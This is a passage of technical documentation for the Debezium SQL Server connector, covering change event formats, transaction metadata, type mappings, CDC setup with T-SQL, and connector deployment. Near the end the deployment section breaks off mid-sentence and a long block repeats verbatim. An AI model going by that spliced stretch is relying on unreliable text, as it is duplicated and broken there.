 "email": "noreply@example.org"
 },
 "after": null, // <2>
 "source": { // <3>
 "version": "{debezium-version}",
 "connector": "sqlserver",
 "name": "server1",
 "ts_ms": 1559730445243,
 "snapshot": false,
 "db": "testDB",
 "schema": "dbo",
 "table": "customers",
 "change_lsn": "00000027:00000db0:0005",
 "commit_lsn": "00000027:00000db0:0007",
 "event_serial_no": 1
 },
 "op": "d", // <4>
 "ts_ms": 1559730450205 // <5>
 }
}
----

.Descriptions of _delete_ event value fields
[cols="1,2,7",options="header"]
|===
|Item |Field name |Description

|1
|`before`
|Optional field that specifies the state of the row before the event occurred. 
In a _delete_ event value, the `before` field contains the values that were in the row before it was deleted with the database commit.

|2
|`after`
| Optional field that specifies the state of the row after the event occurred. In a _delete_ event value, the `after` field is `null`, signifying that the row no longer exists.

|3
|`source`
a|Mandatory field that describes the source metadata for the event. In a _delete_ event value, the `source` field structure is the same as for _create_ and _update_ events for the same table. Many `source` field values are also the same. In a _delete_ event value, the `ts_ms` and LSN field values, as well as other values, might have changed. But the `source` field in a _delete_ event value provides the same metadata:

* {prodname} version
* Connector type and name
* Database and schema names
* Timestamp for when the change was made in the database
* If the event was part of a snapshot
* Name of the table that contains the deleted row
* Server log offsets

|4
|`op`
a|Mandatory string that describes the type of operation. The `op` field value is `d`, signifying that this row was deleted.

|5
|`ts_ms`
a| Optional field that displays the time at which the connector processed the event.
In the event message envelope, the time is based on the system clock in the JVM running the Kafka Connect task. +
 +
In the `source` object, `ts_ms` indicates the time that the change was made in the database.
By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.

|===

SQL Server connector events are designed to work with link:{link-kafka-docs}/#compaction[Kafka log compaction]. Log compaction enables removal of some older messages as long as at least the most recent message for every key is kept. This lets Kafka reclaim storage space while ensuring that the topic contains a complete data set and can be used for reloading key-based state.

[[sqlserver-tombstone-events]]
.Tombstone events
When a row is deleted, the _delete_ event value still works with log compaction, because Kafka can remove all earlier messages that have that same key. However, for Kafka to remove all messages that have that same key, the message value must be `null`. 
To make this possible, after {prodname}’s SQL Server connector emits a _delete_ event, the connector emits a special tombstone event that has the same key but a `null` value.

// Type: assembly
// ModuleID: debezium-sql-server-connector-generated-events-that-represent-transaction-boundaries
// Title: {prodname} SQL Server connector-generated events that represent transaction boundaries
[[sqlserver-transaction-metadata]]
=== Transaction metadata

{prodname} can generate events that represent transaction boundaries and that enrich data change event messages.

[NOTE]
.Limits on when {prodname} receives transaction metadata
====
{prodname} registers and receives metadata only for transactions that occur after you deploy the connector.
Metadata for transactions that occur before you deploy the connector is not available.
====

Database transactions are represented by a statement block that is enclosed between the `BEGIN` and `END` keywords.
{prodname} generates transaction boundary events for the `BEGIN` and `END` delimiters in every transaction.
Transaction boundary events contain the following fields:

`status`:: `BEGIN` or `END`.
`id`:: String representation of the unique transaction identifier.
`ts_ms`:: The time of a transaction boundary event (`BEGIN` or `END` event) at the data source.
If the data source does not provide {prodname} with the event time, then the field instead represents the time at which {prodname} processes the event.
`event_count` (for `END` events):: Total number of events emitted by the transaction.
`data_collections` (for `END` events):: An array of pairs of `data_collection` and `event_count` elements that indicates the number of events that the connector emits for changes that originate from a data collection.

[WARNING]
====
There is no way for {prodname} to reliably identify when a transaction has ended.
The transaction `END` marker is thus emitted only after the first event of another transaction arrives.
This can lead to the delayed delivery of the `END` marker in the case of a low-traffic system.
====

The following example shows a typical transaction boundary message:

.Example: SQL Server connector transaction boundary event
[source,json,indent=0,subs="+attributes"]
----
{
 "status": "BEGIN",
 "id": "00000025:00000d08:0025",
 "ts_ms": 1486500577125,
 "event_count": null,
 "data_collections": null
}

{
 "status": "END",
 "id": "00000025:00000d08:0025",
 "ts_ms": 1486500577691,
 "event_count": 2,
 "data_collections": [
 {
 "data_collection": "testDB.dbo.tablea",
 "event_count": 1
 },
 {
 "data_collection": "testDB.dbo.tableb",
 "event_count": 1
 }
 ]
}
----

Unless overridden via the xref:sqlserver-property-topic-transaction[`topic.transaction`] option,
transaction events are written to the topic named xref:sqlserver-property-topic-prefix[`_<topic.prefix>_`]`.transaction`.

// Type: concept
// ModuleID: change-data-event-enrichment
==== Change data event enrichment

When transaction metadata is enabled, the data message `Envelope` is enriched with a new `transaction` field.
This field provides information about every event in the form of a composite of fields:

`id`:: String representation of the unique transaction identifier.
`total_order`:: The absolute position of the event among all events generated by the transaction.
`data_collection_order`:: The per-data collection position of the event among all events that were emitted 
by the transaction.

The following example shows what a typical message looks like:

[source,json,indent=0,subs="+attributes"]
----
{
 "before": null,
 "after": {
 "pk": "2",
 "aa": "1"
 },
 "source": {
...
 },
 "op": "c",
 "ts_ms": "1580390884335",
 "transaction": {
 "id": "00000025:00000d08:0025",
 "total_order": "1",
 "data_collection_order": "1"
 }
}
----

// Type: reference
// ModuleID: how-debezium-sql-server-connectors-map-data-types
// Title: How {prodname} SQL Server connectors map data types
[[sqlserver-data-types]]
=== Data type mappings

The {prodname} SQL Server connector represents changes to table row data by producing events that are structured like the table in which the row exists.
Each event contains fields to represent the column values for the row.
The way in which an event represents the column values for an operation depends on the SQL data type of the column.
In the event, the connector maps the fields for each SQL Server data type to both a _literal type_ and a _semantic type_.

Literal type:: Describes how the value is literally represented by using Kafka Connect schema types, namely `INT8`, `INT16`, `INT32`, `INT64`, `FLOAT32`, `FLOAT64`, `BOOLEAN`, `STRING`, `BYTES`, `ARRAY`, `MAP`, and `STRUCT`.
Semantic type:: Describes how the Kafka Connect schema captures the _meaning_ of the field using the name of the Kafka Connect schema for the field.

If the default data type conversions do not meet your needs, you can {link-prefix}:{link-custom-converters}#custom-converters[create a custom converter] for the connector.

ifdef::product[]

For more information about data type mappings, see the following sections:

* xref:sql-server-basic-values[]
* xref:sql-server-temporal-values[]
* xref:sql-server-decimal-values[]
* xref:sql-server-timestamp-values[]

endif::product[]

[id="sql-server-basic-values"]
==== Basic types

The following table shows how the connector maps basic SQL Server data types.

.Data type mappings used by the SQL Server connector
[cols="30%a,25%a,45%a",options="header"]
|===
|SQL Server data type
|Literal type (schema type)
|Semantic type (schema name) and Notes

|`BIT`
|`BOOLEAN`
|n/a

|`TINYINT`
|`INT16`
|n/a

|`SMALLINT`
|`INT16`
|n/a

|`INT`
|`INT32`
|n/a

|`BIGINT`
|`INT64`
|n/a

|`REAL`
|`FLOAT32`
|n/a

|`FLOAT[(N)]`
|`FLOAT64`
|n/a

|`CHAR[(N)]`
|`STRING`
|n/a

|`VARCHAR[(N)]`
|`STRING`
|n/a

|`TEXT`
|`STRING`
|n/a

|`NCHAR[(N)]`
|`STRING`
|n/a

|`NVARCHAR[(N)]`
|`STRING`
|n/a

|`NTEXT`
|`STRING`
|n/a

|`XML`
|`STRING`
|`io.debezium.data.Xml` +
 +
Contains the string representation of an XML document

|`DATETIMEOFFSET[(P)]`
|`STRING`
|`io.debezium.time.ZonedTimestamp` +
 +
A string representation of a timestamp with timezone information, where the timezone is GMT

|===
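As an illustration of these mappings, consider the following hypothetical table (a sketch; the table and column names are illustrative and not part of the connector documentation). The comments indicate the literal type, and where applicable the semantic type, that the preceding table says the connector emits for each column.

[source,sql,indent=0]
----
-- Hypothetical table that exercises several of the basic type mappings.
CREATE TABLE mapping_demo (
    id         INT               NOT NULL PRIMARY KEY, -- INT32
    active     BIT               NOT NULL,             -- BOOLEAN
    weight     REAL              NULL,                 -- FLOAT32
    name       NVARCHAR(100)     NULL,                 -- STRING
    details    XML               NULL,                 -- STRING, io.debezium.data.Xml
    created_at DATETIMEOFFSET(7) NULL                  -- STRING, io.debezium.time.ZonedTimestamp
);
----

Other data type mappings are described in the following sections.

If present, a column's default value is propagated to the corresponding field's Kafka Connect schema.
Change messages contain the field's default value
(unless an explicit column value was given), so there is rarely a need to obtain the default value from the schema.
ifdef::community[]
Passing the default value helps, though, with satisfying the compatibility rules when xref:{link-avro-serialization}[using Avro] as 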
serialization format together with the Confluent schema registry.
endif::community[]

[[sql-server-temporal-values]]
==== Temporal values

Other than SQL Server's `DATETIMEOFFSET` data type (which contains time zone information), the other temporal types depend on the value of the `time.precision.mode` configuration property. When the `time.precision.mode` configuration property is set to `adaptive` (the default), the connector determines the literal type and semantic type for the temporal types based on the column's data type definition so that events _exactly_ represent the values in the database:

[cols="30%a,25%a,45%a",options="header"]
|===
|SQL Server data type
|Literal type (schema type)
|Semantic type (schema name) and Notes

|`DATE`
|`INT32`
|`io.debezium.time.Date` +
 +
Represents the number of days since the epoch.

|`TIME(0)`, `TIME(1)`, `TIME(2)`, `TIME(3)`
|`INT32`
|`io.debezium.time.Time` +
 +
Represents the number of milliseconds past midnight, and does not include timezone information.

|`TIME(4)`, `TIME(5)`, `TIME(6)`
|`INT64`
|`io.debezium.time.MicroTime` +
 +
Represents the number of microseconds past midnight, and does not include timezone information.

|`TIME(7)`
|`INT64`
|`io.debezium.time.NanoTime` +
 +
Represents the number of nanoseconds past midnight, and does not include timezone information.

|`DATETIME`
|`INT64`
|`io.debezium.time.Timestamp` +
 +
Represents the number of milliseconds past the epoch, and does not include timezone information.

|`SMALLDATETIME`
|`INT64`
|`io.debezium.time.Timestamp` +
 +
Represents the number of milliseconds past the epoch, and does not include timezone information.

|`DATETIME2(0)`, `DATETIME2(1)`, `DATETIME2(2)`, `DATETIME2(3)`
|`INT64`
|`io.debezium.time.Timestamp` +
 +
Represents the number of milliseconds past the epoch, and does not include timezone information.

|`DATETIME2(4)`, `DATETIME2(5)`, `DATETIME2(6)`
|`INT64`
|`io.debezium.time.MicroTimestamp` +
 +
Represents the number of microseconds past the epoch, and does not include timezone information.

|`DATETIME2(7)`
|`INT64`
|`io.debezium.time.NanoTimestamp` +
 +
Represents the number of nanoseconds past the epoch, and does not include timezone information.

|===

When the `time.precision.mode` configuration property is set to `connect`, the connector uses the predefined Kafka Connect logical types. This may be useful when consumers only know about the built-in Kafka Connect logical types and are unable to handle variable-precision time values. On the other hand, since SQL Server supports a tenth of a microsecond precision, the events generated by a connector with the `connect` time precision mode will *result in a loss of precision* when the database column has a _fractional second precision_ value greater than 3:

[cols="25%a,20%a,55%a",options="header"]
|===
|SQL Server data type
|Literal type (schema type)
|Semantic type (schema name) and Notes

|`DATE`
|`INT32`
|`org.apache.kafka.connect.data.Date` +
 +
Represents the number of days since the epoch.

|`TIME([P])`
|`INT64`
|`org.apache.kafka.connect.data.Time` +
 +
Represents the number of milliseconds since midnight, and does not include timezone information. 
SQL Server allows `P` to be in the range 0-7 to store up to a tenth of a microsecond precision, though this mode results in a loss of precision when `P` > 3.

|`DATETIME`
|`INT64`
|`org.apache.kafka.connect.data.Timestamp` +
 +
Represents the number of milliseconds since the epoch, and does not include timezone information.

|`SMALLDATETIME`
|`INT64`
|`org.apache.kafka.connect.data.Timestamp` +
 +
Represents the number of milliseconds past the epoch, and does not include timezone information.

|`DATETIME2`
|`INT64`
|`org.apache.kafka.connect.data.Timestamp` +
 +
Represents the number of milliseconds since the epoch, and does not include timezone information. SQL Server allows `P` to be in the range 0-7 to store up to a tenth of a microsecond precision, though this mode results in a loss of precision when `P` > 3.

|===

[[sql-server-timestamp-values]]
===== Timestamp values

The `DATETIME`, `SMALLDATETIME` and `DATETIME2` types represent a timestamp without time zone information.
Such columns are converted into an equivalent Kafka Connect value based on UTC.
So for instance the `DATETIME2` value "2018-06-20 15:13:16.945104" is represented by an `io.debezium.time.MicroTimestamp` with the value "1529507596945104".

Note that the timezone of the JVM running Kafka Connect and {prodname} does not affect this conversion.

[id="sql-server-decimal-values"]
==== Decimal values

{prodname} connectors handle decimals according to the setting of the xref:{link-sqlserver-connector}#sqlserver-property-decimal-handling-mode[`decimal.handling.mode` connector configuration property].

decimal.handling.mode=precise::
+
.Mappings when `decimal.handling.mode=precise`
[cols="30%a,15%a,55%a",options="header",subs="+attributes"]
|===
|SQL Server type
|Literal type (schema type)
|Semantic type (schema name)

|`NUMERIC[(P[,S])]`
|`BYTES`
a|`org.apache.kafka.connect.data.Decimal` +
The `scale` schema parameter contains an integer that represents how many digits the decimal point shifted.

|`DECIMAL[(P[,S])]`
|`BYTES`
a|`org.apache.kafka.connect.data.Decimal` +
The `scale` schema parameter contains an integer that represents how many digits the decimal point shifted.

|`SMALLMONEY`
|`BYTES`
a|`org.apache.kafka.connect.data.Decimal` +
The `scale` schema parameter contains an integer that represents how many digits the decimal point shifted.

|`MONEY`
|`BYTES`
a|`org.apache.kafka.connect.data.Decimal` +
The `scale` schema parameter contains an integer that represents how many digits the decimal point shifted.

|===

decimal.handling.mode=double::
+
.Mappings when `decimal.handling.mode=double`
[cols="30%a,30%a,40%a",options="header",subs="+attributes"]
|===
|SQL Server type |Literal type |Semantic type

|`NUMERIC[(P[,S])]`
|`FLOAT64`
a|_n/a_

|`DECIMAL[(P[,S])]`
|`FLOAT64`
a|_n/a_

|`SMALLMONEY`
|`FLOAT64`
a|_n/a_

|`MONEY`
|`FLOAT64`
a|_n/a_

|===

decimal.handling.mode=string::
+
.Mappings when `decimal.handling.mode=string`
[cols="30%a,30%a,40%a",options="header",subs="+attributes"]
|===
|SQL Server type |Literal type |Semantic type

|`NUMERIC[(P[,S])]`
|`STRING`
a|_n/a_

|`DECIMAL[(P[,S])]`
|`STRING`
a|_n/a_

|`SMALLMONEY`
|`STRING`
a|_n/a_

|`MONEY`
|`STRING`
a|_n/a_

|===
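As a sketch of how these modes differ, consider the following hypothetical column and value (the table name and value are illustrative, not taken from the connector documentation):

[source,sql,indent=0]
----
-- Hypothetical column used to compare decimal.handling.mode settings.
CREATE TABLE price_demo (
    id    INT           NOT NULL PRIMARY KEY,
    price DECIMAL(10,2) NOT NULL -- precision 10, scale 2
);
INSERT INTO price_demo (id, price) VALUES (1, 123.45);
-- decimal.handling.mode=precise (default): price is emitted as a Kafka Connect
--   org.apache.kafka.connect.data.Decimal; the unscaled value 12345 is encoded
--   as bytes, and the schema carries the parameter scale=2.
-- decimal.handling.mode=double: price is emitted as the FLOAT64 value 123.45,
--   which can lose precision for very large or very precise values.
-- decimal.handling.mode=string: price is emitted as the STRING value "123.45".
----

// Type: assembly
// ModuleID: setting-up-sql-server-for-use-with-the-debezium-sql-server-connector
// Title: Setting up SQL Server to run a {prodname} 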
connector\n[[setting-up-sqlserver]]\n== Setting up SQL Server\n\nFor {prodname} to capture change events from SQL Server tables, a SQL Server administrator with the necessary privileges must first run a query to enable CDC on the database.\nThe administrator must then enable CDC for each table that you want Debezium to capture.\n\n[NOTE]\n====\nBy default, JDBC connections to Microsoft SQL Server are protected by SSL encryption.\nIf SSL is not enabled for a SQL Server database, or if you want to connect to the database without using SSL, you can disable SSL by setting the value of the `database.encrypt` property in connector configuration to `false`.\n====\n\nifdef::product[]\n\nFor details about setting up SQL Server for use with the {prodname} connector, see the following sections:\n\n* xref:enabling-cdc-on-the-sql-server-database[]\n* xref:enabling-cdc-on-a-sql-server-table[]\n* xref:verifying-debezium-connector-access-to-the-cdc-table[]\n* xref:debezium-sql-server-connector-on-azure[]\n* xref:effect-of-sql-server-capture-job-agent-configuration-on-server-load-and-latency[]\n* xref:sql-server-capture-job-agent-configuration-parameters[]\n\nendif::product[]\n\nAfter CDC is applied, it captures all of the `INSERT`, `UPDATE`, and `DELETE` operations that are committed to the tables for which CDD is enabled.\nThe {prodname} connector can then capture these events and emit them to Kafka topics.\n\n\/\/ Type: procedure\n\/\/ ModuleID: enabling-cdc-on-the-sql-server-database\n=== Enabling CDC on the SQL Server database\n\nBefore you can enable CDC for a table, you must enable it for the SQL Server database.\nA SQL Server administrator enables CDC by running a system stored procedure.\nSystem stored procedures can be run by using SQL Server Management Studio, or by using Transact-SQL.\n\n.Prerequisites\n* You are a member of the _sysadmin_ fixed server role for the SQL Server.\n* You are a db_owner of the database.\n* The SQL Server Agent is running.\n\nNOTE: The SQL Server CDC feature processes changes that occur in user-created tables only. You cannot enable CDC on the SQL Server `master` database.\n\n.Procedure\n\n. From the *View* menu in SQL Server Management Studio, click *Template Explorer*.\n. In the *Template Browser*, expand *SQL Server Templates*.\n. Expand *Change Data Capture > Configuration* and then click *Enable Database for CDC*.\n. In the template, replace the database name in the `USE` statement with the name of the database that you want to enable for CDC.\n. 
Run the stored procedure `sys.sp_cdc_enable_db` to enable the database for CDC.
+
After the database is enabled for CDC, a schema with the name `cdc` is created, along with a CDC user, metadata tables, and other system objects.
+
The following example shows how to enable CDC for the database `MyDB`:
+
.Example: Enabling a SQL Server database for the CDC template
[source,sql]
----
USE MyDB
GO
EXEC sys.sp_cdc_enable_db
GO
----

// Type: procedure
// ModuleID: enabling-cdc-on-a-sql-server-table
=== Enabling CDC on a SQL Server table

A SQL Server administrator must enable change data capture on the source tables that you want {prodname} to capture.
The database must already be enabled for CDC.
To enable CDC on a table, a SQL Server administrator runs the stored procedure `sys.sp_cdc_enable_table` for the table.
The stored procedures can be run by using SQL Server Management Studio, or by using Transact-SQL.
SQL Server CDC must be enabled for every table that you want to capture.

.Prerequisites
* CDC is enabled on the SQL Server database.
* The SQL Server Agent is running.
* You are a member of the `db_owner` fixed database role for the database.

.Procedure
. From the *View* menu in SQL Server Management Studio, click *Template Explorer*.
. In the *Template Browser*, expand *SQL Server Templates*.
. Expand *Change Data Capture > Configuration*, and then click *Enable Table Specifying Filegroup Option*.
. In the template, replace the table name in the `USE` statement with the name of the table that you want to capture.
. Run the stored procedure `sys.sp_cdc_enable_table`.
+
The following example shows how to enable CDC for the table `MyTable`:
+
.Example: Enabling CDC for a SQL Server table
[source,sql]
----
USE MyDB
GO

EXEC sys.sp_cdc_enable_table
@source_schema = N'dbo',
@source_name = N'MyTable', //<.>
@role_name = N'MyRole', //<.>
@filegroup_name = N'MyDB_CT',//<.>
@supports_net_changes = 0
GO
----
<.> Specifies the name of the table that you want to capture.
<.> Specifies a role `MyRole` to which you can add users to whom you want to grant `SELECT` permission on the captured columns of the source table.
Users in the `sysadmin` or `db_owner` role also have access to the specified change tables. Set the value of `@role_name` to `NULL` to allow only members of the `sysadmin` or `db_owner` roles to have full access to captured information.
<.> Specifies the `filegroup` where SQL Server places the change table for the captured table.
The named `filegroup` must already exist.
It is best not to locate change tables in the same `filegroup` that you use for source tables.
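After you run `sys.sp_cdc_enable_db` and `sys.sp_cdc_enable_table`, you can confirm that CDC is active by checking the CDC flags in the catalog views. The following query is a sketch; the database and table names are the illustrative `MyDB` and `MyTable` from the preceding examples.

[source,sql,indent=0]
----
-- Check the database-level CDC flag.
SELECT name, is_cdc_enabled
FROM sys.databases
WHERE name = 'MyDB';

-- Check the table-level CDC flag.
USE MyDB;
SELECT name, is_tracked_by_cdc
FROM sys.tables
WHERE name = 'MyTable';
----

Both queries return `1` in the flag column for a successfully enabled database and table.

// Type: procedure
// ModuleID: verifying-debezium-connector-access-to-the-cdc-table
=== Verifying that the user has access to the CDC table

A SQL Server administrator can run a system stored procedure to query a database or table to retrieve its CDC configuration information.
The stored procedures can be run by using SQL Server Management Studio, or by using Transact-SQL.

.Prerequisites
* You have `SELECT` permission on all of the captured columns of the capture instance.
Members of the `db_owner` database role can view information for all of the defined capture instances.
* You have membership in any gating roles that are defined for the table information that the query includes.

.Procedure

. From the *View* menu in SQL Server Management Studio, click *Object Explorer*.
. 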
From the Object Explorer, expand *Databases*, and then expand your database object, for example, *MyDB*.
. Expand *Programmability > Stored Procedures > System Stored Procedures*.
. Run the `sys.sp_cdc_help_change_data_capture` stored procedure to query the table.
+
Queries should not return empty results.
+
The following example runs the stored procedure `sys.sp_cdc_help_change_data_capture` on the database `MyDB`:
+
.Example: Querying a table for CDC configuration information
[source, sql]
----
USE MyDB;
GO
EXEC sys.sp_cdc_help_change_data_capture
GO
----
+
The query returns configuration information for each table in the database that is enabled for CDC and that contains change data that the caller is authorized to access.
If the result is empty, verify that the user has privileges to access both the capture instance and the CDC tables.

// Type: concept
// ModuleID: debezium-sql-server-connector-on-azure
[[sqlserver-on-azure]]
=== SQL Server on Azure

The {prodname} SQL Server connector can be used with SQL Server on Azure.
Refer to https://docs.microsoft.com/en-us/samples/azure-samples/azure-sql-db-change-stream-debezium/azure-sql-db-change-stream-debezium/[this example] for configuring CDC for SQL Server on Azure and using it with {prodname}.

ifdef::community[]

[[sqlserver-always-on-replica]]
=== SQL Server Always On

The SQL Server connector can capture changes from an Always On read-only replica.

.Prerequisites
* Change data capture is configured and enabled on the primary node.
SQL Server does not support CDC directly on replicas.
* The configuration option `database.applicationIntent` is set to `ReadOnly`.
This is required by SQL Server.
When {prodname} detects this configuration option, it responds by taking the following actions:

** Sets `snapshot.isolation.mode` to `snapshot`, which is the only transaction isolation mode that is supported for read-only replicas.
** Commits the (read-only) transaction in every execution of the streaming query loop, which is necessary to get the latest view of CDC data.

endif::community[]

// Type: concept
// ModuleID: effect-of-sql-server-capture-job-agent-configuration-on-server-load-and-latency
=== Effect of SQL Server capture job agent configuration on server load and latency

When a database administrator enables change data capture for a source table, the capture job agent begins to run.
The agent reads new change event records from the transaction log and replicates the event records to a change data table.
Between the time that a change is committed in the source table, and the time that the change appears in the corresponding change table, there is always a small latency interval.
This latency interval represents a gap between when changes occur in the source table and when they become available for {prodname} to stream to Apache Kafka.

Ideally, for applications that must respond quickly to changes in data, you want to maintain close synchronization between the source and change tables.
You might imagine that running the capture agent to continuously process change events as rapidly as possible would result in increased throughput and reduced latency, populating change tables with new event records as soon as possible after the events occur, in near real time.
However, this is not necessarily the case.
There is a performance penalty to pay in the pursuit of more immediate synchronization.
Each time that the capture job agent queries the database for new 
event records, it increases the CPU load on the database host.
The additional load on the server can have a negative effect on overall database performance, and potentially reduce transaction efficiency, especially during times of peak database use.

It's important to monitor database metrics so that you know if the database reaches the point where the server can no longer support the capture agent's level of activity.
If you notice performance problems, there are SQL Server capture agent settings that you can modify to help balance the overall CPU load on the database host with a tolerable degree of latency.

// Type: reference
// ModuleID: sql-server-capture-job-agent-configuration-parameters
=== SQL Server capture job agent configuration parameters

On SQL Server, parameters that control the behavior of the capture job agent are defined in the SQL Server table link:https://docs.microsoft.com/en-us/sql/relational-databases/system-tables/dbo-cdc-jobs-transact-sql?view=latest[`msdb.dbo.cdc_jobs`].
If you experience performance issues while running the capture job agent, adjust capture job settings to reduce CPU load by running the link:https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sys-sp-cdc-change-job-transact-sql?view=latest[`sys.sp_cdc_change_job`] stored procedure and supplying new values, as shown in the sketch that follows the parameter list.

[NOTE]
====
Specific guidance about how to configure SQL Server capture job agent parameters is beyond the scope of this documentation.
====

The following parameters are the most significant for modifying capture agent behavior for use with the {prodname} SQL Server connector:

`pollinginterval`::
* Specifies the number of seconds that the capture agent waits between log scan cycles.
* A higher value reduces the load on the database host and increases latency.
* A value of `0` specifies no wait between scans.
* The default value is `5`.

`maxtrans`::
* Specifies the maximum number of transactions to process during each log scan cycle.
After the capture job processes the specified number of transactions, it pauses for the length of time that the `pollinginterval` specifies before the next scan begins.
* A lower value reduces the load on the database host and increases latency.
* The default value is `500`.

`maxscans`::
* Specifies a limit on the number of scan cycles that the capture job can attempt in capturing the full contents of the database transaction log.
If the `continuous` parameter is set to `1`, the job pauses for the length of time that the `pollinginterval` specifies before it resumes scanning.
* A lower value reduces the load on the database host and increases latency.
* The default value is `10`.
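The following Transact-SQL sketch shows how these parameters might be adjusted; the values are illustrative only and must be tuned against your own workload. You run the procedure in the database for which CDC is enabled.

[source,sql,indent=0]
----
USE MyDB
GO
-- Illustrative values: wait 10 seconds between log scans and process
-- fewer transactions per scan to reduce CPU load (at the cost of latency).
EXEC sys.sp_cdc_change_job
    @job_type = N'capture',
    @pollinginterval = 10,
    @maxtrans = 250,
    @maxscans = 10
GO
-- Stop and restart the capture job for the new values to take effect.
----

.Additional resources
* For more information about capture agent parameters, see the SQL Server documentation.

// Type: assembly
// ModuleID: deployment-of-debezium-sql-server-connectors
// Title: Deployment of {prodname} SQL Server connectors
[[sqlserver-deploying-a-connector]]
== Deployment

ifdef::community[]
To deploy a {prodname} SQL Server connector, you install the {prodname} SQL Server connector archive, configure the connector, and start the connector by adding its configuration to Kafka Connect.

.Prerequisites
* link:https://zookeeper.apache.org/[Apache ZooKeeper], link:http://kafka.apache.org/[Apache Kafka], and link:{link-kafka-docs}.html#connect[Kafka Connect] are installed.
* SQL Server is installed, is 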
xref:{link-sqlserver-connector}#setting-up-sqlserver[configured for CDC], and is ready to be used with the {prodname} connector.

.Procedure
. Download the {prodname} https://repo1.maven.org/maven2/io/debezium/debezium-connector-sqlserver/{debezium-version}/debezium-connector-sqlserver-{debezium-version}-plugin.tar.gz[SQL Server connector plug-in archive].
. Extract the files into your Kafka Connect environment.
. Add the directory with the JAR files to {link-kafka-docs}/#connectconfigs[Kafka Connect's `plugin.path`].
. xref:{link-sqlserver-connector}#sqlserver-example-configuration[Configure the connector] and xref:{link-sqlserver-connector}#sqlserver-adding-connector-configuration[add the configuration to your Kafka Connect cluster.]
. Restart your Kafka Connect process to pick up the new JAR files.

If you are working with immutable containers, see link:https://hub.docker.com/r/debezium/[{prodname}'s container images] for Apache ZooKeeper, Apache Kafka, and Kafka Connect.
You can pull the official link:https://hub.docker.com/_/microsoft-mssql-server[container images for Microsoft SQL Server on Linux] from Docker Hub.

You can also xref:operations/openshift.adoc[run {prodname} on Kubernetes and OpenShift].
endif::community[]

ifdef::product[]
You can use either of the following methods to deploy a {prodname} SQL Server connector:

* xref:openshift-streams-sqlserver-connector-deployment[Use {StreamsName} to automatically create an image that includes the connector plug-in].
+
This is the preferred method.
* xref:deploying-debezium-sqlserver-connectors[Build a custom Kafka Connect container image from a Dockerfile].

.Additional resources

* xref:descriptions-of-debezium-sqlserver-connector-configuration-properties[]

// Type: concept
[id="openshift-streams-sqlserver-connector-deployment"]
=== SQL Server connector deployment using {StreamsName}

include::{partialsdir}/modules/all-connectors/con-connector-streams-deployment.adoc[leveloffset=+1]

// Type: procedure
[id="using-streams-to-deploy-debezium-sqlserver-connectors"]
=== Using {StreamsName} to deploy a {prodname} SQL Server connector
include::{partialsdir}/modules/all-connectors/proc-using-streams-to-deploy-a-debezium-connector.adoc[leveloffset=+1]

// Type: procedure
// ModuleID: deploying-debezium-sqlserver-connectors
[[sql-server-deploying-a-connector]]
=== Deploying a {prodname} SQL Server connector by building a custom Kafka Connect container image from a Dockerfile

To deploy a {prodname} SQL Server connector, you must build a custom Kafka Connect container image that contains the {prodname} connector archive, and then push this container image to a container registry.
You then need to create the following custom resources (CRs):

* A `KafkaConnect` CR that defines your Kafka Connect instance.
 The `image` property in the CR specifies the name of the container image that you create to run your {prodname} connector.
 You apply this CR to the OpenShift instance where link:https://access.redhat.com/products/red-hat-amq#streams[Red Hat {StreamsName}] is deployed.
 {StreamsName} offers operators and images that bring Apache Kafka to OpenShift.

* A `KafkaConnector` CR that defines your {prodname} SQL Server connector.
 Apply this CR to the same OpenShift instance where you apply the `KafkaConnect` CR.

.Prerequisites

* SQL Server is running and you completed the steps to 

If you are working with immutable containers, see link:https://hub.docker.com/r/debezium/[{prodname}'s container images] for Apache ZooKeeper, Apache Kafka, and Kafka Connect.
You can pull the official link:https://hub.docker.com/_/microsoft-mssql-server[container images for Microsoft SQL Server on Linux] from Docker Hub.

You can also xref:operations/openshift.adoc[run {prodname} on Kubernetes and OpenShift].
endif::community[]

ifdef::product[]
You can use either of the following methods to deploy a {prodname} SQL Server connector:

* xref:openshift-streams-sqlserver-connector-deployment[Use {StreamsName} to automatically create an image that includes the connector plug-in].
+
This is the preferred method.
* xref:deploying-debezium-sqlserver-connectors[Build a custom Kafka Connect container image from a Dockerfile].

.Additional resources

* xref:descriptions-of-debezium-sqlserver-connector-configuration-properties[]

// Type: concept
[id="openshift-streams-sqlserver-connector-deployment"]
=== SQL Server connector deployment using {StreamsName}

include::{partialsdir}/modules/all-connectors/con-connector-streams-deployment.adoc[leveloffset=+1]

// Type: procedure
[id="using-streams-to-deploy-debezium-sqlserver-connectors"]
=== Using {StreamsName} to deploy a {prodname} SQL Server connector
include::{partialsdir}/modules/all-connectors/proc-using-streams-to-deploy-a-debezium-connector.adoc[leveloffset=+1]

// Type: procedure
// ModuleID: deploying-debezium-sqlserver-connectors
[[sql-server-deploying-a-connector]]
=== Deploying a {prodname} SQL Server connector by building a custom Kafka Connect container image from a Dockerfile

To deploy a {prodname} SQL Server connector, you must build a custom Kafka Connect container image that contains the {prodname} connector archive, and then push this container image to a container registry.
You then need to create the following custom resources (CRs):

* A `KafkaConnect` CR that defines your Kafka Connect instance.
 The `image` property in the CR specifies the name of the container image that you create to run your {prodname} connector.
 You apply this CR to the OpenShift instance where link:https://access.redhat.com/products/red-hat-amq#streams[Red Hat {StreamsName}] is deployed.
 {StreamsName} offers operators and images that bring Apache Kafka to OpenShift.

* A `KafkaConnector` CR that defines your {prodname} SQL Server connector.
 Apply this CR to the same OpenShift instance where you apply the `KafkaConnect` CR.

.Prerequisites

* SQL Server is running and you completed the steps to {LinkDebeziumUserGuide}#setting-up-sql-server-for-use-with-the-debezium-sql-server-connector[set up SQL Server to work with a {prodname} connector].

* {StreamsName} is deployed on OpenShift and is running Apache Kafka and Kafka Connect.
 For more information, see link:{LinkDeployStreamsOpenShift}[{NameDeployStreamsOpenShift}].

* Podman or Docker is installed.

* You have an account and permissions to create and manage containers in the container registry (such as `quay.io` or `docker.io`) to which you plan to add the container that will run your Debezium connector.

.Procedure

. Create the {prodname} SQL Server container for Kafka Connect:

.. Create a Dockerfile that uses `{DockerKafkaConnect}` as the base image.
For example, from a terminal window, enter the following command:
+
[source,shell,subs="+attributes,+quotes"]
----
cat <<EOF >debezium-container-for-sqlserver.yaml // <1>
FROM {DockerKafkaConnect}
USER root:root
RUN mkdir -p /opt/kafka/plugins/debezium // <2>
